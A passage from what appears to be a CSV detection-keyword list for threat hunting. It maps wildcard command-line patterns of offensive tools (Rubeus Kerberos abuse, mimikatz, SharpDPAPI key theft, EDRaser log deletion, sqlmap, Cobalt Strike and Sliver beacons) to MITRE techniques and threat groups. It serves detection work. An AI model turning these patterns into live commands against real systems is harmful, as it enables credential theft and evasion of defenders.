T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","0","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"* asktgs * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgs *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgs /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgt * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgt /user *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktht /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asm.py -t * -ln -w resources/*.txt -o *","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"* asn-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* asreproast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* --asreproast *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --asreproast *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --assemblyargs AntiVirus*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* --assemblyargs AppLocker*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"* Athena.Commands*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* Athena.Models.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* athena.mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* --attack bruteforce*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"* --attack injection*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"* --attack partial_d --key *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --attack partial_q --key *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -attack remote_db -db_type * -db_username * -db_password *","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"* --attack vulns *","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"* -attack windows_application_event_log_local*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"* -attack windows_event_log*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 
- T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"* -attack windows_security_event_log_remote*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"* --attacker-host *","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"* --attacker-port *","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"* -attak syslog*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"* --authmode ntlm --username * --password *","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD 
Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"* auth-owners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* auth-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* avred.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"* avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"* awsloot.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"* -b *.bin *.bin dump*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" +"* BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"* --backdoor *","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"* backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* backorifice-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* backorifice-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* backupkey* /server:* /file*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* bacnet-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* banner.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* base64_encode_shellcode*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"* --basic ""FUZZ:FUZ2Z""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --batch 
--dbs*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --batch --password*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* beacon.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"* beacon_win_default*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"* --beacon=*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"* beacon64.bin *","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","0","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"* Benjamin DELPY *","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"* beRoot.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"* bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation 